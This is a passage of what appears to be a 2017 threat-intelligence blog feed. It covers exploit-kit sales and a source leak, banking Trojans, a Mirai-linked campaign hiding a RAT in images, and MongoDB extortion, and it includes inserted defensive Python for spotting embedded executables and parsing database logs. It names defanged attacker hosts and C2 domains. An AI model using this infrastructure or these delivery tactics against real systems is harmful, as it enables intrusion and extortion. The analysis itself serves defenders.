    Opinions appear to differ on whether outside forces would want to influence the Dutch elections. Russia is taken as the leading example by Tony van der Togt from the Clingendael Institute in The Hague, who argues that while there have been threats from Russia in the past, such as during the MH17 investigation, the Dutch General Elections might not even be of interest to them. He points out that, unlike some other European populists, Wilders has no interest in improving Russian–Dutch relations. On the other hand, Fox-IT co-founder Ronald Prins suggests that “the Dutch elections are good practice for [the Russians].” In fact, Prins argued, compromised emails might still be published, as Russia has stolen military government information in the past.

    Motivations are further muddied by nuances in the Dutch political system. Whereas the U.S. election came down to a campaign between two people, the Dutch political system operates slightly differently. Discrediting one individual does not necessarily lead to the election of their rival. This is down to three factors:

    1. The House of Representatives (Tweede Kamer der Staten-Generaal) is operated by a cabinet formed by a coalition. Even if a party wins, they usually have to join with the party coming in second place in order to secure a majority in the House (though a minority coalition is not ruled out).
    2. While each party has their appointed top candidates for the elections (lijsttrekker), this does not guarantee the top candidate of the biggest party will become Prime Minister.
    3. The Netherlands has a number of political parties eligible for seats in the House. During the 2017 elections, 28 parties are eligible for one (or more) of the 150 seats. This means that cyber threats motivated by an attempt to influence the election results might not produce significant effects, due to the complexity and unpredictability of the coalition-forming process.

    Although there are cyber threats to the General Elections, due to the nature of the Dutch system and precautions already taken, these will be more limited in scope than they were to the U.S. presidential elections. Perhaps that’s why Dutch citizens are more concerned with taking various online tests to see which party best matches their ideas, or they are busy trying to keep their digital pet politician alive.

    Learning from the Top Threats Financial Services Faced in 2016
    Wed, 08 Mar 2017 18:55:27 +0000

    Organizations operating within the financial services industry represent an attractive target for threat actors.

    Here are three types of threat facing financial services that we observed in 2016:

    1. Banking Trojans

    Throughout 2016, we observed the continual evolution of banking Trojans, such as TrickBot, GozNym (Figure 1) and Panda. As banking Trojans evolve we will see them adopt increasingly complex techniques, spread to new regions, and incorporate new languages. Early detection of changes in targeting trends can help organizations to be better prepared.


    Figure 1: GozNym for sale on a dark web marketplace

    2. Targeted intrusions

    Throughout 2016, a relatively large number of network intrusions targeting the financial services and banking sector were reported, including several major thefts. These include attacks on SWIFT interfaces, as well as actions by KS Group and Buhtrap. It’s no surprise we’ve seen a continuation of this activity in 2017, including a campaign against 84 financial services organizations.

    3. Extortion

    The arrests of key members of DD4BC in early 2016 failed to halt the trend in DDoS extortion. Actors such as Armada Collective, Kadyrovtsy and vimproducts were all credible actors in this space. Of course, understanding the veracity of threats is a challenge for organizations.

    Another approach to extortion emerged through ransomware. Barely a week went by without another variant being offered or sold online. Understanding the tactics of these actors – such as delivery methods – can help organizations to better protect themselves. Indeed, spam emails, malicious attachments and exploit kits such as RIG are likely to remain viable delivery methods for ransomware in 2017. A rise in Ransomware-as-a-Service models will make it easier for these types of attacks to proliferate. Figure 2, for example, shows nearly 1,200 sales of a ransomware source code on a dark web marketplace.


    Figure 2: Ransomware source code for sale on a dark web marketplace

    Aside from DDoS extortion and ransomware, an interesting development to extortion occurred in the case of Valartis Bank in Liechtenstein, where an actor attempted to extort the customers themselves in order to diversify their revenue stream.

    Of course, it’s not all about the financially motivated actors; ideological actors, such as hacktivists, can also offer a real threat.

    Successful attacks can have widespread and damaging impact for organizations and their customers. By understanding the threats and the tactics, techniques and procedures (TTPs) that security professionals in the financial services sector face, organizations can better manage their digital risk and align their security strategies in 2017.

    New “Blaze” exploit kit claims to exploit recent Cisco WebEx vulnerability
    Thu, 02 Mar 2017 11:08:32 +0000

    A previously undetected exploit kit has been offered for sale on the clear web forum HackForums since February 8, 2017 under the name “Blaze Exploit Kit”. It was offered for sale by a user with the nickname “Cat Warrior” (see Figure 1), who has a good reputation on the forum and who had previously operated a service for the purchase of bots called “BotShop”.


    Figure 1 – Initial advertisement for Blaze

    Recent Vulnerabilities

    The advertisement for the Blaze exploit kit claimed it was capable of exploiting a total of 16 vulnerabilities. An examination of the vulnerabilities showed that they related to Internet Explorer, Java, Microsoft Silverlight, Adobe Flash Player and a Cisco WebEx extension vulnerability. Indeed, Blaze’s alleged exploitation of the WebEx vulnerability could represent a shift in targeting from average end users to a more business oriented focus.  The most recent were discovered and patches released for them in 2017. The CVE numbers were included in the advertisement, but it was not confirmed if the exploit kit included exploits for them at the time of writing. See Table 1 for a list of these.


    Table 1 – List of vulnerabilities for which Blaze claimed exploits

    Rental prices for Blaze were offered in two plans. The first was priced at $300 per week or $1,200 per month, and included the Internet Explorer and Flash Player exploits advertised. The second plan was priced at $600 per week or $2,400 per month, and purported to include Mozilla Firefox exploits, although no evidence of these was detected in the advertised vulnerabilities. Payment was accepted in Bitcoin only. When first advertised, the Blaze exploit kit was purportedly in its first version, but a post on February 10, 2017 by “Cat Warrior” suggested a second version would be released in the near future. Furthermore, “Cat Warrior” claimed further updates would include a domain rotator and a steganography feature. Feedback for the Blaze exploit kit was predominantly positive at the time of writing, with at least four users claiming it functioned as advertised. While skepticism was expressed by two reputable users on the forum, they did not provide any evidence to suggest the offering was not credible.

    The Outlook

    Due to the positive reputation and previous service that the user “Cat Warrior” has operated in the past, it is possible that this new exploit kit is legitimate. While other reputable users did have doubts as to the legitimacy of the new kit, no evidence was provided to suggest otherwise. All of the vulnerabilities, when exploited, could allow for remote code execution (RCE) to take place.

    An incoming exploit kit with promises of current (2017) vulnerability exploitation capabilities would benefit from the currently unsaturated exploit kit market. Since June and July of 2016, the exploit kit marketplace saw a large drop in terms of kit numbers, with many other kits (e.g. Nuclear and Angler) becoming outdated and abandoned. The source code for the popular Sundown exploit kit was leaked online, which could signal its demise soon, or at least see a surge of similar kits come onto the landscape. If this new exploit kit is legitimate, it could become successful as it distinguishes itself by using current vulnerabilities and promises upcoming updates.

    However, the success and market share of the kit remains to be seen. As with any cybercriminal offering, and technology businesses in general, the continued success and uptake by customers will rely heavily on the reputation that it acquires through its functionality, regular updates, customer service and effectiveness. What differentiates Blaze from many other exploit kits is the relative openness of the advertising. Previously highly successful exploit kits, such as Angler, had a very low public profile. This may be a double-edged sword for Blaze; while open advertising may mean a large customer base, it may also attract the attention of the public and, potentially, law-enforcement, an obvious risk to its continued operation.

    Step by Step: The Changing Face of Threat Led Penetration Testing
    Tue, 28 Feb 2017 11:33:00 +0000

    Organizations are increasingly adopting the threat led approach to penetration testing. This approach essentially advances the boundaries of conventional penetration testing by seeking to adopt the tactics, techniques and procedures of an advanced threat actor aggressively targeting a critical system.

    The Bank of England-backed CBEST scheme and the CREST-accredited STAR scheme are the two main programs to have emerged that have adopted threat led penetration testing. The first wave of CBEST tests has already occurred, with the Bank of England having urged the UK’s systemically important financial institutions to take the test.

    A STAR test is similar to a CBEST test in many ways, but differs in that it has no input from the regulator. However, it’s no longer just the United Kingdom; Hong Kong and the Netherlands are developing their own schemes that aggressively test critical systems in a live environment. Even where there is no requirement to conduct threat led penetration testing, the approach can benefit organizations across the globe that are interested in conducting more effective assessments of their security posture.

    Although such schemes are in their infancy, I’ve noticed a rapid development, particularly within the STAR scheme – the change from a linear to iterative process.

    The STAR Test

    A basic breakdown of the project steps for both a CBEST and STAR test is shown below:

    Provider                  | Project Phase
    --------------------------|------------------------------------------------------------------------------------------------
    Threat Intelligence (TI)  | Define number of Critical Functions (CFs) in scope
                              | Construct targeting report based on open source research around the CFs
                              | Develop Threat Actor profiles specific to the CFs and based on the results of the targeting report
                              | Develop scenarios, with approximately one scenario per CF
                              | Deliver Threat Intelligence report
    Penetration Tester (PEN)  | Conduct penetration test based on results of the Threat Intelligence Phase of the project

    The table above demonstrates two main factors:

    1. There are two distinct providers involved in a CBEST/STAR test; the Threat Intelligence and the Penetration Tester.
    2. The process flows linearly from start to finish.

    But this is starting to change. The linear flow is beginning to be replaced with a more iterative cycle that involves far greater dialog between the threat intelligence and penetration test provider. This not only results in a more cohesive project for the client, but it also demonstrates a profound change to threat led penetration testing. This is highlighted through the presentation of the attack scenarios.

    Linear versus Iterative Process

    Within the conventional, linear threat led penetration test, the scenarios are presented to the client as threat scenarios that could possibly work against a Critical Function (see below for stages 1-6). This is based on the previous reconnaissance and estimation of the capabilities of the threat actor. However, it is common for a scenario to quickly become unworkable early in the penetration test stage due to some unseen control within the client environment. Often, only 1 out of 5 scenarios become viable.

    1. Define number of Critical Functions (CFs) in scope
    2. Construct targeting report based on open source research around the CFs
    3. Develop Threat Actor profiles specific to the CFs and based on the results of the targeting report
    4. Develop scenarios, with approximately one scenario per CF
    5. Deliver Threat Intelligence report
    6. Conduct penetration test based on results of the Threat Intelligence Phase of the project

    Within the more iterative model of a threat led penetration test, the threat intelligence provider initially delivers a far more slimmed down scenario that really just designates the ultimate effect on the Critical Function, as opposed to a blow-by-blow road map for the penetration tester to work through. The scenarios are subsequently updated as the penetration tester discovers nuances within the client network.

    This is the fundamental difference between the linear and iterative approach to threat led penetration testing. In a sequential test the scenarios are either achievable or not. In an iterative style test, on the other hand, all of the scenarios should be achievable by the end of the test.

    The Benefits of an Iterative Process

    With so many scenarios now viable, organizations will, understandably, seek security assurances. To allay these concerns, I suggest the development of an additional framework to examine factors around the actor featured within the scenario. Factors might include:

    • Motivation
    • Level of resourcing
    • Technical skill
    • Access to advanced tools

    These factors could all be used to effectively ‘benchmark’ a scenario. The penetration testers would begin at the lowest level, but increase each factor over time.

    The Outcome

    The completion of this iterative approach will result in a test that will reassure the organization that their system is secure against a constellation of actors with a defined set of skills and resources. Organizations can then better prioritize security spending and allocate resources as appropriate.

    Sun to Set on BEPS/Sundown Exploit Kit? Wed, 22 Feb 2017 16:53:27 +0000 On February 13, 2017, the security researcher David Montenegro (@CryptoInsane) posted a series of tweets claiming that the source code for the BEPS exploit kit had been leaked online. Montenegro’s posts were accompanied by screenshots which showed a log file purportedly taken from the dump, which featured references to the actor “Kriminalac” and the Yugoslavian Business Network (YBN).

    BEPS and the Sundown exploit kit are commonly referred to interchangeably and we have previously assessed that these two kits are likely the same. This leak was also acknowledged by the user @666_KingCobra, who has previously claimed to be the creator and operator of the Terror exploit kit, an exploit kit that closely imitated Sundown.

    What was leaked?

    @666_KingCobra claims the leak includes exploit kit source code, control panel data, and exploit code for a number of vulnerabilities. This user also claimed that the kit was, at the time of posting, hosted on 188[.]209[.]49[.]98. In addition to these claims, on February 11, 2017 a thread was created on the criminal forum Hack Forums claiming that the source code for the BEPS exploit kit had been leaked and warning other users to treat offers of paid access to exploit kits with caution. Again on February 11, 2017, a listing on the dark web criminal marketplace AlphaBay offering the code for sale was also detected (shown in Figure 1). Based on the identification of three independent sources who all made consistent claims, it was assessed to be probable that the genuine BEPS source code has indeed been made publicly available online.


    Figure 1 – AlphaBay listing for the BEPS source code and exploits.

    Nobody said it was easy

    Towards the end of 2016, it was clear that threat actors were drawn to using the Mirai botnet source code – but required technical help to actually make use of it (See Motherboard’s “Wannabe Hackers Are Willing to Pay To Learn How To Use the Mirai Botnet”). Following the release of the BEPS (Sundown) exploit kit source code, a similar phenomenon is occurring.

    It is probable that the majority of actors who attempt to use this source code will not be successful in their attempts to operationalize the exploit kit. Examinations of other exploit kit operations have indicated that significant logistical support is required for success, as threat actors must obtain a continuous flow of victim traffic to landing pages, as well as a supply of domains to actually host landing pages. Kit operators must also develop or obtain exploit code in order to improve their exploit kit’s capability if they wish to remain competitive in the marketplace.

    These challenges are likely to represent significant obstacles for threat actors who do not already have the resources and access necessary to secure this logistical support.

    Looking Forward

    The availability of the BEPS/Sundown source code is likely to have a significant impact on the exploit kit’s operators. It will likely both erode user trust in this criminal service and force the operators to invest time and resources in differentiating their source code and developing new exploits.

    This will likely have the effect, at least in the short term, of further contracting the exploit kit landscape, which shrank significantly in 2016 as a result of the disappearance of Angler and Neutrino. Other than Sundown, only the RIG exploit kit and Magnitude have remained significantly active into 2017. At the time of writing the vast majority of exploit kit traffic was linked with various versions of RIG, indicating that this kit will likely continue to dominate the exploit kit space in the future, barring a disruption to its operations.

    Four Things to Look Out for This Valentine’s Day Tue, 14 Feb 2017 17:44:50 +0000 Consumers are increasingly moving to the Internet for their holiday purchases—and Valentine’s Day is no exception. According to the National Retail Federation, in 2017, almost 30% of consumers planned to shop online, which is double the response from 2010 (16.3%).

    The prevalence and convenience of online shopping is not only enticing to consumers searching for the best deal on bouquets. Threat actors celebrate Valentine’s Day too—yet they are not hoping for flowers or chocolate. It is typical for actors to escalate cyber attacks during seasonal events when individual victims are often unwary and most vulnerable. These attacks target both individual users and online vendors, exploiting known vulnerabilities to gain access to personal information or extort money from victims.

    Your heart may be vulnerable this Valentine’s Day, but your online presence should not be. Here are four ‘gifts’ you should look out for this Valentine’s Day:

    1. Not-So-True Love

    How do you know when it is true love? Chances are, if your digital ‘loved one’ asks for money, they are not real. Romance scams have become increasingly common, with the UK’s National Fraud Intelligence Bureau reporting over 3,800 victims in 2016 alone. These scams often take place via dating websites and apps. Heartless scammers take advantage of people looking for romantic partners by gaining their affection and using that emotional vulnerability to extort money, often in large sums.

    2. Ransom Notes

    Rather than love notes, in 2016, over 30 florists received ransom notes demanding payment in exchange for the cessation of targeted denial-of-service campaigns against their websites.  There is no doubt that being offline during one of the busiest seasons of the year can lead to huge losses in revenue for florists and other e-tailers. Under pressure, these ransom demands are more likely to be met—something criminal actors are counting on. With the release of the Mirai botnet source code online, it is likely that we will see more and more high-volume denial of service attacks against retailers.

    Other actors have targeted unauthenticated MongoDB installations and replaced their contents with a ransom note and payment instructions. This new extortion method was first observed on December 20, 2016 and continues to affect open MongoDB installations at time of writing.

    3. Malicious Advertisements

    Attackers can use web and mobile advertisements as a means of distributing malware by luring victims with one-time offers and bargain prices. These advertisements usually involve an attacker injecting malicious code into a legitimate advert which will either download malware directly onto a victim’s machine or redirect visitors to a website that then distributes malware. Online dating sites have previously carried such advertisements. In 2015, the dating sites PlentyofFish and Match both delivered fake ads to their users, leading Match to briefly suspend adverts on their UK website.

    4. Phishing emails and pages

    Phishing emails are not always as easy to spot as the ones with the subject lines advertising singles in your area. Attackers will try to trick users through fake emails and websites that at first glance, look legitimate. These sites can be used to steal victims’ credentials or to distribute malware.

    Researchers identified a convincing phishing campaign that combines social engineering and technical attacks to target Gmail users. The malicious email, which originates from a compromised account of a known contact, is tailored to contain a subject line and an image relevant to both the recipient and the sender. However, when the image is clicked, a new tab opens prompting the user to re-enter their credentials. Once an account was compromised, the attackers used the victim’s own contact list to conduct further attacks.

    Organizations and individuals ought to be aware of these four tactics used by adversaries and take steps to protect their data, infrastructure, employees and customers.

    An unusually Swift(tay) malware delivery tactic Thu, 09 Feb 2017 18:28:52 +0000 While doing some background research into recent reporting by Dr Web on a newly identified version of Mirai, we made an interesting discovery. VirusTotal behavioural analyses for the Windows Mirai hashes provided by Dr Web indicated that each sample used HTTP GET requests to download text files from three subdomains on what appeared to be a threat actor controlled site (f4321y[.]com). Each sample also used HTTP GET requests to request the infected host’s IP from pubyun[.]com and, significantly, to download an image file from a Chinese social media site. Interest piqued, we took a look at the file and discovered that it was an image of Taylor Swift carrying an embedded portable executable (PE) file. Examination of the PE indicated that it was a malicious executable named WPD.exe, which was found to be classified as a remote access trojan (RAT).


    Figure 1 – Image downloaded by Windows Mirai malware samples.

    We decided to dig a little further and examine the passive DNS data for the C2 domain identified by Dr Web. This indicated that it was hosted on an IP address which also hosts another domain (mykings[.]pw) with three subdomains named identically to those on the Windows Mirai C2 domain. Further examination turned up 25 further malware samples which were found to behave very similarly to those identified by Dr Web. All sent HTTP GET requests to request host IPs from pubyun[.]com and to download text files from subdomains of mykings[.]pw. Several of these samples were also found to be sending DNS requests to f4321y[.]com. In addition to these behaviors, many of these samples also pulled identical images of Taylor Swift carrying a second malicious PE file from another Chinese social media site. The chart below provides a graphical representation of these connections.


    Figure 2 – Link chart of entities involved in malware delivery campaign.

    Based on the information we’ve been able to assemble, it appeared likely that whoever was responsible for the Windows Mirai operation identified by Dr Web has also been using linked infrastructure (and pictures of Taylor Swift) to distribute and operate a RAT and at least 25 other malware samples. The scale of this distribution operation was not known at the time of writing, but compilation and signature signing timestamps on many of the malicious files indicated that many of the malicious executables identified were created in February 2017, suggesting that at the time of writing, this element of the distribution operation was relatively recent. It remains to be seen whether any further information on this campaign will Swiftly emerge.
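    A detection-side check for the delivery trick described in this post, written as an added example (not code from the original post or from Dr Web): it scans an image file for a DOS ‘MZ’ header whose e_lfanew pointer lands on a real ‘PE\0\0’ signature and notes whether the header sits past the image’s own end marker. The sample input it builds is constructed, not the real image.

```python
"""Flag image files that carry an embedded Windows executable.

Added example, not code from the original post or from Dr Web. The Windows
Mirai samples described above fetched an image that carried a PE file; this
scanner looks for a DOS 'MZ' header whose e_lfanew pointer lands on a valid
'PE\\0\\0' signature, and reports whether it sits past the image's own end
marker (the usual place for an appended payload).
"""
import struct
from typing import List, Optional

PE_SIGNATURE = b"PE\x00\x00"
JPEG_SOI, JPEG_EOI = b"\xff\xd8", b"\xff\xd9"
PNG_MAGIC, PNG_IEND = b"\x89PNG\r\n\x1a\n", b"IEND"

# IMAGE_FILE_HEADER.Machine values from the PE/COFF specification.
MACHINE_NAMES = {0x014C: "i386", 0x8664: "x86-64", 0x01C0: "ARM", 0xAA64: "ARM64"}


def image_payload_end(data: bytes) -> Optional[int]:
    """Offset just past the image's own end marker, or None if unknown.

    Only the first JPEG EOI after the SOI is used; an EXIF thumbnail can embed
    an inner JPEG with its own EOI, so treat the result as a hint, not proof.
    """
    if data.startswith(JPEG_SOI):
        eoi = data.find(JPEG_EOI, 2)
        return None if eoi == -1 else eoi + 2
    if data.startswith(PNG_MAGIC):
        iend = data.find(PNG_IEND)
        return None if iend == -1 else iend + 4 + 4      # chunk type + CRC
    return None


def find_embedded_pe(data: bytes) -> List[dict]:
    """Return one record per MZ header that points at a real PE signature."""
    findings = []
    image_end = image_payload_end(data)
    start = 0
    while True:
        mz = data.find(b"MZ", start)
        if mz == -1:
            break
        start = mz + 1
        if mz + 0x40 > len(data):              # IMAGE_DOS_HEADER is 0x40 bytes
            continue
        e_lfanew = struct.unpack_from("<I", data, mz + 0x3C)[0]
        pe = mz + e_lfanew
        # e_lfanew cannot point inside the DOS header, and the PE signature
        # plus the Machine field must fit in the buffer.
        if e_lfanew < 0x40 or pe + 6 > len(data):
            continue
        if data[pe:pe + 4] != PE_SIGNATURE:
            continue
        machine = struct.unpack_from("<H", data, pe + 4)[0]
        findings.append({
            "offset": mz,
            "e_lfanew": e_lfanew,
            "machine": MACHINE_NAMES.get(machine, hex(machine)),
            "after_image_end": image_end is not None and mz >= image_end,
        })
    return findings


def build_sample() -> bytes:
    """Constructed input: a minimal JPEG skeleton with a fake 32-bit PE appended."""
    jpeg = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 10 + b"\xff\xd9"
    dos_header = bytearray(0x80)
    dos_header[0:2] = b"MZ"
    struct.pack_into("<I", dos_header, 0x3C, 0x80)   # e_lfanew -> NT headers at 0x80
    # IMAGE_FILE_HEADER: Machine=i386, 1 section, zeroed timestamps/pointers,
    # SizeOfOptionalHeader=0xE0, Characteristics=EXECUTABLE_IMAGE|32BIT_MACHINE.
    file_header = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 0xE0, 0x0102)
    return jpeg + bytes(dos_header) + PE_SIGNATURE + file_header


if __name__ == "__main__":
    for hit in find_embedded_pe(build_sample()):
        print(hit)
```

    A hit with after_image_end set is the strongest signal; a hit inside the image body still warrants a look, since a PE can also be stored in a metadata segment.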

    F3EAD: Find, Fix, Finish, Exploit, Analyze and Disseminate – The Alternative Intelligence Cycle Wed, 08 Feb 2017 19:57:00 +0000 The F3EAD cycle (Find, Fix, Finish, Exploit, Analyze and Disseminate) is an alternative intelligence cycle commonly used within Western militaries within the context of operations that typically result in lethal action, such as drone strikes and special forces operations. A basic summary of the phases of the cycle is as follows:

    1. Find: essentially ‘picking up the scent’ of the opponent, with the classic “Who, What, When, Where, Why” questions being used within this phase to identify a candidate target
    2. Fix: verification of the target(s) identified within the previous phase, which typically involves multiple triangulation points. This phase effectively transforms the intelligence gained within the “Find” phase into evidence that can be used as basis for action within the next stage
    3. Finish: based on the evidence generated from the previous two phases, the commander of the operation imposes their will on the target
    4. Exploit: deconstruction of the evidence generated from the finish phase
    5. Analyze: fusing the exploited evidence with the wider intelligence picture
    6. Disseminate: finally publishing the results of the research to key stakeholders

    Looking at the above cycle from an information security perspective, it becomes obvious that it can be applied within a cyber security context. This is borne out by making small changes to the above narrative, i.e. replacing “Kill or capture” with “remove or restrict.” Many security teams already practice “find-remove-on to the next” and, while that is at the core of the F3EAD cycle, there is still value in defining the process within the confines of the framework.

    Some may ask, “is F3EAD merely reinventing the wheel of the intelligence cycle?” I would argue ‘no’: F3EAD is far more tactical in practice than the more strategic intelligence cycle, with its less defined boundaries of Direction, Collection, Analysis and Dissemination.

    What the existence of both these intelligence cycles shows is that intelligence as a professional practice spans a number of levels within the organization, from the high-level strategic decision making that the intelligence cycle caters to, down to the tactical, ‘minute by minute’ style of operation that the F3EAD cycle supports. Within this context, both cycles could be implemented within an organization. Shown below is a simple example of a hypothetical organization using both cycles to combat an Advanced Persistent Threat group; the intention is to show how the cycles interlink and provide mutual support to each other, and some of the key stakeholders invested in both.

    The Intelligence Cycle

    Phase          Action
    Direction      Board level identification of APT groups as the core cyber security threat to the business
    Collection     The company’s threat intelligence team collects data gathered from internal response cases and fuses it with data provided by the external threat intelligence provider.
    Analysis       A full fusion and analysis of collected data over a strategic period of time (6 months to 1 year)
    Dissemination  Results communicated back to the board and the wider threat intelligence community around the specific APT threat that has targeted the company

    The F3EAD Cycle

    Phase          Action
    Find           Suspect activity identified on a number of hosts
    Fix            Multiple common indicators of suspicious activity identify a cluster of infected hosts
    Finish         Hosts are taken offline and employees are given new machines
    Exploit        Based on analysis of malware found within the infected hosts a number of specific Indicators of Compromise (IOCs) are identified by the team
    Analyse        Fusing the IOCs found ‘in house’ with the IOCs provided by the third party intelligence provider feeds into the wider picture of the APT threat and leads to further identification of anomalous behavior on the company’s network
    Disseminate    The results of the analysis are disseminated to both tactical consumers (SOC etc) and the strategic sponsors of the project, i.e. the members of the ‘c suite’ with an interest in the issue

    What can be seen from the above example is that the intelligence cycle and the F3EAD cycle can be employed closely together to fulfill the company’s overall intelligence requirements, both tactical and strategic. One way of visualizing these two cycles is as cogs turning together within the intelligence process, with intersections between the intelligence cycle’s “Collection” phase and the F3EAD cycle’s “Find” phase. This relationship is shown below.

    F3EAD and Intelligence Cycle


    How the Frenzy Unfolded: Analyzing Various Mongo Extortion Campaigns Tue, 07 Feb 2017 15:30:59 +0000 The MongoDB “ransom” pandemic, which has been in the spotlight for the best part of a month, still appears to be affecting MongoDB installations and various campaigns still appear to be receiving payments. The latest payment for one of the campaigns was as recent as January 20, 2017.

    Figure 1 – Recent bitcoin transactions for the files named PLEASE_README

    This post will provide additional insight into our previous research in an attempt to identify a timeline of when the first campaigns started and the subsequent copycat campaigns. While we are aware that there were already attacks on open Mongo databases focusing on deleting data, this new approach appeared to be the first widespread, multi-campaign attack based on extortion. We define these attacks as extortion rather than ransom since most campaigns did not appear to even attempt to view or back up the data before deleting it.

    As per our previous research into open MongoDB services, we set out to identify publicly available open Mongo Status Interfaces. The MongoDB HTTP Status interface is designed for listing information that may be of interest to the database administrators, including database version information, system information and recent client requests. These status pages listen on TCP port 28017 rather than port 27017 commonly used for MongoDB itself. The Status Interface service has been deprecated since version 3.2.

    By scraping the logs of publicly accessible MongoDB Status pages, we reviewed the logs for almost 7,000 MongoDB instances. These logs provide information regarding connections to the MongoDB, including the deletion and creation of databases and the times at which they occurred. We gathered and collated a list of the times at which DB allocations and drops occurred for these 7,000 deployments. Using these results we were able to get a rough estimate of the timelines and volumes of these various MongoDB extortion campaigns. The campaigns shown in Figure 2 can be identified by their database naming conventions.


    Figure 2 – Rate of databases created over time, per campaign.

    The dataset also provided us with a good indicator of the largest campaigns and the battle raging between them. The output below shows one campaign dropping the “WARNING” database and creating “PLEASE_READ”.

    01:20:57.810 [conn670] dropDatabase WARNING starting
    01:20:57.810 [conn670] removeJournalFiles
    01:20:57.816 [conn670] dropDatabase WARNING finished
    01:20:57.940 [FileAllocator] allocating new datafile /var/lib/mongodb/PLEASE_READ.ns, filling with zeroes…
    01:20:57.944 [FileAllocator] done allocating datafile /var/lib/mongodb/PLEASE_READ.ns, size: 16MB,  took 0.003 secs
    01:20:57.944 [FileAllocator] allocating new datafile /var/lib/mongodb/PLEASE_READ.0, filling with zeroes…
    01:20:57.946 [FileAllocator] done allocating datafile /var/lib/mongodb/PLEASE_READ.0, size: 64MB,  took 0.001 secs
    01:20:57.946 [FileAllocator] allocating new datafile /var/lib/mongodb/PLEASE_READ.1, filling with zeroes…
    01:20:57.953 [FileAllocator] done allocating datafile /var/lib/mongodb/PLEASE_READ.1, size: 128MB,  took 0.006 secs
    01:20:57.954 [conn670] build index PLEASE_READ.PLEASE_READ { _id: 1 }

    Figure 3 – An example of competing efforts by ransomware actors, with files being reallocated over a short period of time

    The total number of malicious databases created is shown below. The tally can include multiple database creations on a single server, as this can occur when various campaigns have overwritten each other repeatedly. It is also worth noting that some of the status pages reviewed provided data for non-public, localhost-only databases, so these wouldn’t be affected by the attacks.

    7010 PLEASE_READ
    4223 WARNING
    543 PWNED

     Figure 4 – Malicious DB names
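    The log scraping described above (drop and allocation events pulled from status page logs, tallied by database name, and paired to show one campaign overwriting another) as an added example, not code from the original post; the sample log is constructed, and it assumes the older mongod log line shape shown in Figure 3.

```python
"""Rebuild MongoDB extortion-campaign activity from HTTP status page logs.

Added example, not code from the original post. It assumes the mongod log
shape shown above ("HH:MM:SS.mmm [context] message", optionally preceded by a
"Tue Jan 10 " style date) and counts a database as created when its .ns
namespace file is allocated, so the .0/.1 data files that follow are not
counted again. The sample log below is constructed for illustration.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional

# Database names used by the campaigns tallied in Figure 4 above.
RANSOM_DB_NAMES = {"PLEASE_READ", "WARNING", "PWNED"}

LINE_RE = re.compile(
    r"^(?:[A-Z][a-z]{2} [A-Z][a-z]{2} +\d{1,2} )?"      # optional "Tue Jan 10 "
    r"(?P<stamp>\d{2}:\d{2}:\d{2}\.\d{3}) \[(?P<ctx>[^\]]+)\] (?P<msg>.*)$"
)
DROP_RE = re.compile(r"^dropDatabase (?P<db>\S+) starting$")
ALLOC_RE = re.compile(r"^allocating new datafile \S*/(?P<db>[^/\s]+)\.ns,")

# Constructed sample: one host's log showing a legitimate database being
# dropped, then three campaigns overwriting one another.
SAMPLE_LOG = """\
00:12:03.101 [conn512] dropDatabase shop starting
00:12:03.150 [FileAllocator] allocating new datafile /var/lib/mongodb/PWNED.ns, filling with zeroes...
00:12:03.155 [FileAllocator] allocating new datafile /var/lib/mongodb/PWNED.0, filling with zeroes...
00:40:11.402 [conn598] dropDatabase PWNED starting
00:40:11.480 [FileAllocator] allocating new datafile /var/lib/mongodb/WARNING.ns, filling with zeroes...
01:20:57.810 [conn670] dropDatabase WARNING starting
01:20:57.810 [conn670] removeJournalFiles
01:20:57.816 [conn670] dropDatabase WARNING finished
01:20:57.940 [FileAllocator] allocating new datafile /var/lib/mongodb/PLEASE_READ.ns, filling with zeroes...
01:20:57.944 [FileAllocator] done allocating datafile /var/lib/mongodb/PLEASE_READ.ns, size: 16MB,  took 0.003 secs
01:20:57.944 [FileAllocator] allocating new datafile /var/lib/mongodb/PLEASE_READ.0, filling with zeroes...
01:20:57.954 [conn670] build index PLEASE_READ.PLEASE_READ { _id: 1 }
"""


@dataclass
class Event:
    seconds: float   # seconds since midnight; a single host's log for one day
    stamp: str       # original HH:MM:SS.mmm text, kept for reporting
    kind: str        # "drop" or "create"
    db: str


def _to_seconds(stamp: str) -> float:
    h, m, s = stamp.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def parse_status_log(text: str) -> List[Event]:
    """Extract database drop and creation events from status page log text."""
    events: List[Event] = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        stamp, msg = m.group("stamp"), m.group("msg")
        drop = DROP_RE.match(msg)
        if drop:
            events.append(Event(_to_seconds(stamp), stamp, "drop", drop.group("db")))
            continue
        alloc = ALLOC_RE.match(msg)
        if alloc:
            events.append(Event(_to_seconds(stamp), stamp, "create", alloc.group("db")))
    return events


def tally_created(events: List[Event]) -> Counter:
    """Count created databases by name, as in Figure 4."""
    return Counter(e.db for e in events if e.kind == "create")


def overwrite_chain(events: List[Event], window: float = 5.0) -> List[Dict[str, str]]:
    """Pair each dropDatabase with the ransom database allocated right after it.

    A drop followed within `window` seconds by a ransom-named creation is an
    'initial' compromise if the dropped database was a victim's own, or a
    'takeover' if it belonged to a competing campaign.
    """
    chain: List[Dict[str, str]] = []
    last_drop: Optional[Event] = None
    for e in sorted(events, key=lambda ev: ev.seconds):
        if e.kind == "drop":
            last_drop = e
        elif last_drop and e.db in RANSOM_DB_NAMES and e.seconds - last_drop.seconds <= window:
            kind = "takeover" if last_drop.db in RANSOM_DB_NAMES else "initial"
            chain.append({"dropped": last_drop.db, "created": e.db, "at": e.stamp, "kind": kind})
            last_drop = None
    return chain


if __name__ == "__main__":
    evs = parse_status_log(SAMPLE_LOG)
    for name, count in tally_created(evs).most_common():
        print(f"{count} {name}")
    for step in overwrite_chain(evs):
        print(step)
```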

    MongoDB status pages also exposed a lot more information that could be used by attackers aiming to gain unauthorized access. Some of these databases had been secured with authentication, yet their status and logging service was still left open.


    Figure 5 – Publicly Visible Logs – User authentication

    The MongoDB documentation states that the HTTP status interface should be disabled in production environments in order to prevent this kind of data exposure.

    Final thoughts

    The various campaigns appear to still be rampaging through the public domain, overwriting each other and newly created databases. This will likely continue while people are still feeding the frenzy with Bitcoin payments and attempting to restore backups while still neglecting to password protect their MongoDB instances or firewall them off from the outside world.

